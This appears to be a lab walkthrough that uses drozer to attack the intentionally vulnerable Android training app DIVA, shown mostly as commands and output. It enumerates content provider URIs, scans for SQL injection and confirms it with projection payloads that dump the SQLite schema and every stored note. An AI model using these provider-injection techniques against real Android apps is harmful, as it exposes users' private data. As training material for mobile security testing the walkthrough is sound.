References:
Genymotion:
DIVA:
Drozer:
Download Link:
Document:
1.Connect to drozer server
Start drozer server in genymotion android device.
In client PC,Set adb forward port use command “adb forward tcp:31415 tcp:31415”
Start console to drozer. “drozer console connect”
Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0) .. ..:. ..o.. .r.. ..a.. . ....... . ..nd ro..idsnemesisand..pr .otectorandroidsneme. .,sisandprotectorandroids+. ..nemesisandprotectorandroidsn:. .emesisandprotectorandroidsnemes.. ..isandp,..,rotectorandro,..,idsnem. .isisandp..rotectorandroid..snemisis. ,andprotectorandroidsnemisisandprotec. .torandroidsnemesisandprotectorandroid. .snemisisandprotectorandroidsnemesisan: .dprotectorandroidsnemesisandprotector.drozer Console (v2.4.3)dz> helpdrozer: Android Security Assessment FrameworkType `help COMMAND` for more information on a particular command, or `helpMODULE` for a particular module.Commands: cd contributors env help load permissions set unsetclean echo exit list module run shellMiscellaneous help topics: intents
2.Scan content uri paths.
dz> run app.package.list -f divajakhar.aseem.diva (Diva)dz> run app.provider.app.provider.columns app.provider.download app.provider.info app.provider.query app.provider.update app.provider.delete app.provider.finduri app.provider.insert app.provider.read dz> run app.provider.finduri jakhar.aseem.divaScanning jakhar.aseem.diva...content://jakhar.aseem.diva.provider.notesprovider/notes/content://jakhar.aseem.diva.provider.notesprovidercontent://jakhar.aseem.diva.provider.notesprovider/content://jakhar.aseem.diva.provider.notesprovider/notes
3.Query content’s data
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes| _id | title | note || 5 | Exercise | Alternate days running || 4 | Expense | Spent too much on home theater || 6 | Weekend | b333333333333r || 3 | holiday | Either Goa or Amsterdam || 2 | home | Buy toys for baby, Order dinner || 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
4.Scan sql inject point
Two methods will be injected,it’s projection and selection
dz> run scanner.provider.injection -a jakhar.aseem.divaScanning jakhar.aseem.diva...Not Vulnerable: content://jakhar.aseem.diva.provider.notesprovider content://jakhar.aseem.diva.provider.notesprovider/Injection in Projection: content://jakhar.aseem.diva.provider.notesprovider/notes/ content://jakhar.aseem.diva.provider.notesprovider/notesInjection in Selection: content://jakhar.aseem.diva.provider.notesprovider/notes/ content://jakhar.aseem.diva.provider.notesprovider/notes
5.Validate the sql inject point
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY titledz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY titledz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"| type | name | tbl_name | rootpage | sql || table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) || table | notes | notes | 4 | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) || table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"| _id | title | note || 1 | office | 10 Meetings. 5 Calls. Lunch with CEO || 2 | home | Buy toys for baby, Order dinner || 3 | holiday | Either Goa or Amsterdam || 4 | Expense | Spent too much on home theater || 5 | Exercise | Alternate days running || 6 | Weekend | b333333333333r |